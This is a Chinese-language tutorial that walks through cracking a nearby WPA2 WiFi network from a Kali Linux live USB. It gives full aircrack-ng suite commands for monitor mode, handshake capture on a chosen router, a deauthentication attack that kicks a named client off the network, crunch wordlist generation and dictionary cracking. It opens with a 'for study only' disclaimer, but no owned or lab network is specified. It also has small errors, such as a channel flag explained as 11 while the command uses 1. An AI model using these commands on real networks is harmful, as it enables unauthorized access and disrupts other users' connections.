前言:
#请大家遵守网络安全法!本教程仅供学习和教学,切勿做违法的事情,让我们一起做一个守法公民!
这里的无网卡指的是不去上网购买网卡,但是还是需要用到笔记本电脑自带的网卡。这时,我们并不采用虚拟机来开启kali Linux,而是采用制作U盘,用usb启动的方式来打开kali Linux系统,实现笔记本自带网卡的wifi渗透
那么下面开始教程,史上最详细,小白也会懂
一.先制作带有kali Linux镜像的U盘
1.进入kali官网:Get Kali | Kali Linux
2.下滑会找到
3.点击live boot
4.点击此处下载
5.下载好镜像后继续下载usb制作器Rufus
下载地址:Rufus - 轻松创建USB启动盘
6.准备就绪后将Rufus上的选择都按如图选择
7. 可能会收到有关ISOHybird图像的提示。选择ISO映像,将允许您从Kali Linux ISO编辑文件,但可能会失去硬件兼容性。因此,我们建议选择 DD 映像。
注意:如果选择“DD映像”选项,则可以在USB驱动器上创建另一个分区,从而允许您使用其余空间。开始 ->运行 (Windows + R) -> diskmgmt.msc -> 找到 USB 驱动器 -> 右键单击“未分配” -> 新建简单卷 -> 按照向导的其余部分与下一步,下一步,下一步...
8.等待加载完后,U盘就制作完成了
二.Usb启动项启动kali Linux
这时需要关闭电脑,在点开电源键时疯狂按进入BIOS的按键
比如:我的电脑是dell,我的BIOS启动是f12,每个牌子的电脑有着不同的进入BIOS的特殊按键,这个需要上网去查。
进入后页面是这样
选择开头是USB的进入(但我的电脑没有显示usb,可能是U盘的问题),即可进入kali Linux系统
三.Wifi渗透实验
1.设置无线网卡监听模式
首先列出所有可能干扰无线网卡的程序,并终止这些程序:sudo airmon-ng check
打开监听(混杂模式),并查看此时无线网卡状态
sudo airmon-ng start wlan0
iwconfig
此时无线网卡变成了‘wlan0mon’
接着重启网卡
sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up
2.开启探测并抓包
开启探测:sudo airodump-ng wlan0mon
得到周围WiFi信息:
选取我们要攻击的WiFi,例如backup mac为:8C:DE:F9:25:7A:B8 CH为1
开始抓包:sudo airodump-ng –ivs –bssid 8C:DE:F9:25:7A:B8 -w longas.txt -c 1 wlan0mon
此时,home文件夹里出现了longas.txt-01.ivs文件
--bssid 是路由器的mac地址
-w 是写入到文件longas.txt中0
-c 11 是频道11
--ivs 是之抓取可用于破解的iVS数据报文
3.攻击获得WPA2握手验证数据包
这里为了获得破解所需的WPA2握手验证的整个完整数据包,我们将会发送一种称之为“deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPS2握手验证的完整数据包了。
接下来就需要进行攻击了:新开一个shell
sudo aireplay-ng -0 5 -a 8C:DE:F9:25:7A:B8 -c 28:39:26:38:7D:9B wlan0mon
-0采用deauth攻击模式,后面跟上攻击次数,这里我设置为5,大家可以根据实际情况设置为1-10不等
-a后面跟路由器mac地址
-c后面跟客户端(即连接在此wifi上的某一台设备)的mac地址
此时抓包界面出现“handshake”,即得到了包含WPA2握手验证的完整数据包longas.txt-01.ivs,结束抓包
4.使用crunch得到密码字典
Crunch是kali Linux自带的程序
在shell中输入命令:
crunch 8 8 -t saic%%%% -b 20mb -o START
min 设定最小字符串长度
max 设定最大字符串长度
-t 指定密码输出的格式
Crunch特殊字符
1.%代表数字
2.^代表特殊符号
3.@ 代表小写字母
4.,代表大写符
-b 指定文件输出的大小为20mb
-o 将密码保存到指定文件,后面必须为START
具体参数可参照:
linuxcrunch命令参数,crunch命令详解 以及使用方法(综合我的经验)_春雪芳菲的博客-CSDN博客
会生成下面这一长串文件
将这一长串重命名得到密码字典
passwd.txt
5.遍历字典破译WiFi密码
sudo aircrack-ng -w passwd.txt longas.txt-01.ivs
耐心等候以后得到:
结语:为了写这个贴子,我的电脑直接坏了,这个故事告诉我们,没事别随便重启电脑,重启电脑次数多了电脑直接开不开机,我重新刷了机才能打开,原来保存的东西全部丢失,我emo了……………..